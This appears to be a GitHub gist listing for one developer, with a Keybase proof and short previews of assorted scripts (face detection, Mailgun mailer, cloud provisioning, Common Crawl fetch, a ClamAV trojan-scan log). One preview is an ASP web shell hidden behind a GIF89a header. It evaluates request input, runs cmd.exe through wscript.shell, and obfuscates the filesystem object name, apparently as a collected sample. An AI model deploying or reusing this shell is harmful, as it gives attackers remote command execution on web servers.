I hereby claim:
- I am jonaslejon on github.
- I am jonaslejon (https://keybase.io/jonaslejon) on keybase.
- I have a public key whose fingerprint is 57F6 2694 A9D1 EF48 10AB 396A 27AB BA2E B836 3126
To claim this, I am signing this object:
| #!env python | |
| import cv,pprint,os | |
| from datetime import datetime | |
| HAAR_CASCADE_PATH = "/usr/share/opencv/haarcascades/haarcascade_frontalface_default.xml" | |
| CAMERA_INDEX = 0 | |
| def detect_faces(image, last): | |
| faces = [] |
I hereby claim:
To claim this, I am signing this object:
| define("DOMAIN", "test.se"); | |
| define("MAILGUN_API", "XXX123"); // Mailgun Private API Key | |
| function br2nl($string) { | |
| return preg_replace('/\<br(\s*)?\/?\>/i', "\n", $string); | |
| } | |
| function mg_send($to, $subject, $message) { | |
| $ch = curl_init(); |
| #!/bin/sh | |
| # | |
| # Author: Jonas Lejon <[email protected]> | |
| # 2014-05-30 For Ubuntu | |
| # | |
| # Usage: | |
| # ./tarsnap-install.sh <tarsnap-email> | |
| # | |
| if [ -z "$1" ] | |
| then |
| userdata = """ | |
| #cloud-config | |
| coreos: | |
| etcd: | |
| # generate a new token for each unique cluster from https://discovery.etcd.io/new | |
| discovery: https://discovery.etcd.io/my_unique_token | |
| # multi-region and multi-cloud deployments need to use $public_ipv4 | |
| addr: $public_ipv4:4001 | |
| peer-addr: $public_ipv4:7001 |
| #!/usr/bin/env python | |
| ## | |
| ## Jonas Lejon 2014 | |
| ## | |
| ## sudo pip install apache-libcloud names | |
| import os, sys, time | |
| import names | |
| from libcloud.compute.types import Provider | |
| from libcloud.compute.providers import get_driver |
| <?php | |
| $url = "http://some.url"; | |
| $surbl = new Net_DNSBL_SURBL(); | |
| $dnsbl->setBlacklists(array('list.dnsbl.org','multihop.dnsbl.org','sbl-xbl.spamhaus.org', 'bl.spamcop.net', 'dnsbl.sorbs.net', 'cbl.abuseat.org','blackholes.five-ten-sg.com','dul.dnsbl.sorbs.net', 'zen.spamhaus.org')); | |
| if ($surbl->isListed($url)) | |
| return false; | |
| reuturn true; |
| #!/bin/sh | |
| #JAVA_HOME=/ebs/jdk1.7.0_09/ | |
| export JAVA_HOME=/ebs/jdk1.7.0_09/ | |
| SEGMENT=$1 | |
| s3cmd --add-header=x-amz-request-payer:requester ls s3://aws-publicdatasets/common-crawl/parse-output/segment/$SEGMENT/ > $SEGMENT.txt | |
| grep metadata $SEGMENT.txt > tmpfile | |
| mv tmpfile $SEGMENT.txt | |
| mkdir metadata/$SEGMENT/ | |
| cd metadata/$SEGMENT | |
| for a in `cat ../../$SEGMENT.txt|awk '{print $4}'`; do s3cmd --continue --add-header=x-amz-request-payer:requester get $a; done |
| GIF89alovealihack<%eval request("alihack.com")%> | |
| <%On Error Resume Next | |
| Response.write CreateObject("wscript.shell").exec("cmd.exe /c whoami").StdOut.ReadAll%>| | |
| <%Set Fso=server.createobject("scr"&"ipt"&"ing"&"."&"fil"&"esy"&"ste"&"mob"&"jec"&"t") | |
| sPath=replace(Server.MapPath("\"),"/", "\") | |
| Function CheckDirIsOKWrite(DirStr) | |
| On Error Resume Next | |
| Fso.CreateTextFile(DirStr&"\temp.tmp") | |
| if Err.number<>0 then | |
| Err.Clear() |
| eljefe-2.1/cuckoo/web/tmp_uploads/tmpHXwzkX/384d89e233ce04df0df3f68ab43afcb80a0db375e8c9204f68afb211a35311c3.exe: Win.Trojan.Generickd-217 FOUND | |
| eljefe-2.1/cuckoo/web/tmp_uploads/tmpAa9NTe/384d89e233ce04df0df3f68ab43afcb80a0db375e8c9204f68afb211a35311c3.exe: Win.Trojan.Generickd-217 FOUND | |
| eljefe-2.1/cuckoo/web/tmp_uploads/tmp6c_gCf/384d89e233ce04df0df3f68ab43afcb80a0db375e8c9204f68afb211a35311c3.exe: Win.Trojan.Generickd-217 FOUND | |
| eljefe-2.1/cuckoo/web/tmp_uploads/tmp18VjC9/384d89e233ce04df0df3f68ab43afcb80a0db375e8c9204f68afb211a35311c3.exe: Win.Trojan.Generickd-217 FOUND | |
| Etc. |